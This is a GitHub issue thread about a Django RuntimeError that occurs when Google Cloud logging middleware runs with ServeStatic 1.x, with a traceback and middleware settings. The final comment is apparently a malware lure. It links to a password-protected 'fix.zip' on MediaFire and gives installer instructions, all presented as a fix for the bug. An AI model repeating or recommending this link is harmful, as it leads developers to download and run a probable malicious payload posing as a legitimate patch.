### ISSUE TITLE
GCP Middleware fails to run with ServeStatic

### ISSUE THREAD

**Issue by Archmonger** [Archmonger/ServeStatic#18]
_Originally posted by @brianglass in https://github.com/Archmonger/ServeStatic/issues/13#issuecomment-2312658999_

@Archmonger, I tried this out this morning. First, thank you for finding a solution for this issue and getting a fix out so promptly! Second, I do have a potential issue to report. I haven't dug into this yet, but I'm getting a new error from a middleware lower in the stack that looks like the following:

```
Traceback (most recent call last):
web-1  |   File "/usr/local/lib/python3.12/site-packages/django/core/handlers/exception.py", line 55, in inner
web-1  |     response = get_response(request)
web-1  |                ^^^^^^^^^^^^^^^^^^^^^
web-1  |   File "/usr/local/lib/python3.12/site-packages/google/cloud/logging_v2/handlers/middleware/request.py", line 48, in middleware
web-1  |     return get_response(request)
web-1  |            ^^^^^^^^^^^^^^^^^^^^^
web-1  |   File "/usr/local/lib/python3.12/site-packages/asgiref/sync.py", line 187, in __call__
web-1  |     raise RuntimeError(
web-1  | RuntimeError: You cannot use AsyncToSync in the same thread as an async event loop - just await the async function directly.

```
My MIDDLEWARE setting looks like this: 

```
MIDDLEWARE = [
    'orthocal.middleware.request_queueing',
    'corsheaders.middleware.CorsMiddleware',
    'servestatic.middleware.ServeStaticMiddleware',
    'django.middleware.gzip.GZipMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.locale.LocaleMiddleware',
    'django.middleware.common.CommonMiddleware',
    'google.cloud.logging_v2.handlers.middleware.RequestMiddleware',
    'orthocal.middleware.cache_control',
]
```

If I remove the Google cloud logging middleware, the error goes away. Also, if I downgrade to ServeStatic 1.0.0, the error goes away. I don't know which package is the root cause of the error. I hope to dig into this a little more tonight after work.

**Comment by Gaurav9812** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
